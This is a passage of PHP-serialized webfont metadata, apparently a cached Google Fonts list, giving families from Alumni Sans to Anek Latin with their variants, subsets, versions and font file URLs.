udG-g9QMylBJAV3Bo8KyK61EN_io6npfB.ttf\";s:9:\"600italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kxm7FEN_io6npfB.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kxf7FEN_io6npfB.ttf\";s:9:\"800italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kw47FEN_io6npfB.ttf\";s:9:\"900italic\";s:98:\"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8KwR7FEN_io6npfB.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:41;O:8:\"stdClass\":8:{s:6:\"family\";s:26:\"Alumni Sans Collegiate One\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/alumnisanscollegiateone/v2/MQpB-XChK8G5CtmK_AuGxQrdNvPSXkn0RM-XqjWWhjdayDiPw2ta.ttf\";s:6:\"italic\";s:113:\"http://fonts.gstatic.com/s/alumnisanscollegiateone/v2/MQpD-XChK8G5CtmK_AuGxQrdNvPSXkn0RM-XqjWWhgdYwjytxntaDFU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:42;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Alumni Sans Inline One\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/alumnisansinlineone/v2/RrQBbpJx9zZ3IXTBOASKp5gJAetBdaihcjbpD3AZcr7xbYw.ttf\";s:6:\"italic\";s:104:\"http://fonts.gstatic.com/s/alumnisansinlineone/v2/RrQDbpJx9zZ3IXTBOASKp5gJAetBdaihcjbpP3ITdpz0fYxcrQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:43;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Alumni Sans Pinstripe\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/alumnisanspinstripe/v1/ZgNNjOFFPq_AUJD1umyS30W-Xub8zD1ObhezYrVIpcDA5w.ttf\";s:6:\"italic\";s:102:\"http://fonts.gstatic.com/s/alumnisanspinstripe/v1/ZgNDjOFFPq_AUJD1umyS30W-Xub8zD1ObheDYL9Mh8XQ5_cY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:44;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Amarante\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/amarante/v22/xMQXuF1KTa6EvGx9bq-3C3rAmD-b.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:45;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Amaranth\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/amaranth/v18/KtkuALODe433f0j1zPnCF9GqwnzW.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/amaranth/v18/KtkoALODe433f0j1zMnAHdWIx2zWD4I.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/amaranth/v18/KtkpALODe433f0j1zMF-OPWi6WDfFpuc.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/amaranth/v18/KtkrALODe433f0j1zMnAJWmn42T9E4ucRY8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:46;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Amatic SC\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:6:\"hebrew\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/amaticsc/v24/TUZyzwprpvBS1izr_vO0De6ecZQf1A.ttf\";s:3:\"700\";s:78:\"http://fonts.gstatic.com/s/amaticsc/v24/TUZ3zwprpvBS1izr_vOMscG6eb8D3WTy-A.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:47;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Amethysta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/amethysta/v16/rP2Fp2K15kgb_F3ibfWIGDWCBl0O8Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:48;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Amiko\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"600\";i:2;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/amiko/v12/WwkQxPq1DFK04tqlc17MMZgJ.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/amiko/v12/WwkdxPq1DFK04uJ9XXrEGoQAUco5.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/amiko/v12/WwkdxPq1DFK04uIZXHrEGoQAUco5.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:49;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Amiri\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/amiri/v24/J7aRnpd8CGxBHqUpvrIw74NL.ttf\";s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/amiri/v24/J7afnpd8CGxBHpUrtLYS6pNLAjk.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/amiri/v24/J7acnpd8CGxBHp2VkZY4xJ9CGyAa.ttf\";s:9:\"700italic\";s:72:\"http://fonts.gstatic.com/s/amiri/v24/J7aanpd8CGxBHpUrjAo9zptgHjAavCA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:50;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Amiri Quran\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-09-14\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/amiriquran/v7/_Xmo-Hk0rD6DbUL4_vH8Zq5t7Cycsu-2.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:51;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Amita\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/amita/v16/HhyaU5si9Om7PQlvAfSKEZZL.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/amita/v16/HhyXU5si9Om7PTHTLtCCOopCTKkI.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:52;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Anaheim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/anaheim/v14/8vII7w042Wp87g4G0UTUEE5eK_w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:53;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Andada Pro\";s:8:\"variants\";a:10:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:6:\"italic\";i:6;s:9:\"500italic\";i:7;s:9:\"600italic\";i:8;s:9:\"700italic\";i:9;s:9:\"800italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":10:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/andadapro/v12/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DPJBY8cFLzvIt2S.ttf\";s:3:\"500\";s:93:\"http://fonts.gstatic.com/s/andadapro/v12/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DP7BY8cFLzvIt2S.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/andadapro/v12/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DMXAo8cFLzvIt2S.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/andadapro/v12/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DMuAo8cFLzvIt2S.ttf\";s:3:\"800\";s:93:\"http://fonts.gstatic.com/s/andadapro/v12/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DNJAo8cFLzvIt2S.ttf\";s:6:\"italic\";s:96:\"http://fonts.gstatic.com/s/andadapro/v12/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRmdfHrjNJ82Stjw.ttf\";s:9:\"500italic\";s:96:\"http://fonts.gstatic.com/s/andadapro/v12/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRlVfHrjNJ82Stjw.ttf\";s:9:\"600italic\";s:96:\"http://fonts.gstatic.com/s/andadapro/v12/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRrlYHrjNJ82Stjw.ttf\";s:9:\"700italic\";s:96:\"http://fonts.gstatic.com/s/andadapro/v12/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRoBYHrjNJ82Stjw.ttf\";s:9:\"800italic\";s:96:\"http://fonts.gstatic.com/s/andadapro/v12/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRudYHrjNJ82Stjw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:54;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Andika\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-05-24\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/andika/v22/mem_Ya6iyW-LwqgAbbwRWrwGVA.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/andika/v22/mem9Ya6iyW-Lwqgwb7YVeLkWVNBt.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/andika/v22/mem8Ya6iyW-Lwqg40ZM1UpcaXcl0Aw.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/andika/v22/mem6Ya6iyW-Lwqgwb46pV50ef8xkA76a.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:55;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Anek Bangla\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofm9YIocg56yyvt0.ttf\";s:3:\"200\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofu9ZIocg56yyvt0.ttf\";s:3:\"300\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3OfjFZIocg56yyvt0.ttf\";s:7:\"regular\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofm9ZIocg56yyvt0.ttf\";s:3:\"500\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofl1ZIocg56yyvt0.ttf\";s:3:\"600\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3OfrFeIocg56yyvt0.ttf\";s:3:\"700\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3OfoheIocg56yyvt0.ttf\";s:3:\"800\";s:112:\"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofu9eIocg56yyvt0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:56;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Anek Devanagari\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLDtk-9nFk0LjZ7E.ttf\";s:3:\"200\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLBtku9nFk0LjZ7E.ttf\";s:3:\"300\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLCzku9nFk0LjZ7E.ttf\";s:7:\"regular\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLDtku9nFk0LjZ7E.ttf\";s:3:\"500\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLDfku9nFk0LjZ7E.ttf\";s:3:\"600\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLAzle9nFk0LjZ7E.ttf\";s:3:\"700\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLAKle9nFk0LjZ7E.ttf\";s:3:\"800\";s:121:\"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLBtle9nFk0LjZ7E.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:57;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Anek Gujarati\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0F5G7w0KgB7Lm7g.ttf\";s:3:\"200\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0l5C7w0KgB7Lm7g.ttf\";s:3:\"300\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0SZC7w0KgB7Lm7g.ttf\";s:7:\"regular\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0F5C7w0KgB7Lm7g.ttf\";s:3:\"500\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0JZC7w0KgB7Lm7g.ttf\";s:3:\"600\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0yZe7w0KgB7Lm7g.ttf\";s:3:\"700\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-08Je7w0KgB7Lm7g.ttf\";s:3:\"800\";s:117:\"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0l5e7w0KgB7Lm7g.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:58;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Anek Gurmukhi\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbd5ppXK41H6DjbA.ttf\";s:3:\"200\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkb95tpXK41H6DjbA.ttf\";s:3:\"300\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbKZtpXK41H6DjbA.ttf\";s:7:\"regular\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbd5tpXK41H6DjbA.ttf\";s:3:\"500\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbRZtpXK41H6DjbA.ttf\";s:3:\"600\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbqZxpXK41H6DjbA.ttf\";s:3:\"700\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbkJxpXK41H6DjbA.ttf\";s:3:\"800\";s:117:\"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkb95xpXK41H6DjbA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:59;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Anek Kannada\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dFDEAukVReA1oef.ttf\";s:3:\"200\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dHDEQukVReA1oef.ttf\";s:3:\"300\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dEdEQukVReA1oef.ttf\";s:7:\"regular\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dFDEQukVReA1oef.ttf\";s:3:\"500\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dFxEQukVReA1oef.ttf\";s:3:\"600\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dGdFgukVReA1oef.ttf\";s:3:\"700\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dGkFgukVReA1oef.ttf\";s:3:\"800\";s:114:\"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dHDFgukVReA1oef.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:60;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Anek Latin\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-06-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuR7EZKdClWL3kgw.ttf\";s:3:\"200\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3Pux7AZKdClWL3kgw.ttf\";s:3:\"300\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuGbAZKdClWL3kgw.ttf\";s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuR7AZKdClWL3kgw.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PudbAZKdClWL3kgw.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PumbcZKdClWL3kgw.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3PuoLcZKdClWL3kgw.ttf\";s:3:\"800\";s:110:\"http://fonts.gstatic.com/s/aneklatin/v4/co3pmWZulTRoU4a8dqrWiajBS5ByUkvdrluH-xWG5uJTY4x-L3Pux7cZKdClWL3kgw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:61;O:8:\"stdClass\":8:{s:6:\